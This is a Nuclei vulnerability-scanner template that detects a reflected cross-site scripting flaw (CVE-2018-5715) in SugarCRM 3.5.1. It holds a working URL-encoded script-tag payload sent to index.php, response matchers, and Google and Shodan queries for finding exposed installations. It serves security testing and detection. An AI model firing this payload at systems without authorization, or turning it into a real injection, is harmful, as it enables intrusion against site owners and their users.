nuclei-templates/cves/2018/CVE-2018-5715.yaml

45 lines
1.2 KiB
YAML

id: CVE-2018-5715
info:
name: SugarCRM 3.5.1 - Cross-Site Scripting
author: edoardottt
severity: medium
description: SugarCRM 3.5.1 is vulnerable to cross-site scripting via phprint.php and a parameter name in the query string (aka a $key variable).
reference:
- https://www.exploit-db.com/exploits/43683
- https://m4k4br0.github.io/sugarcrm-xss/
- https://www.exploit-db.com/exploits/43683/
- https://nvd.nist.gov/vuln/detail/CVE-2018-5715
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2018-5715
cwe-id: CWE-79
metadata:
google-query: intext:"SugarCRM Inc. All Rights Reserved"
shodan-query: http.html:"SugarCRM Inc. All Rights Reserved"
tags: sugarcrm,xss,edb,cve,cve2018
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?action=Login&module=Users&print=a&%22%2F%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '&"/><script>alert(1)</script>=&"><< Back</a><br><br>'
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200
# Enhanced by mp on 2022/08/11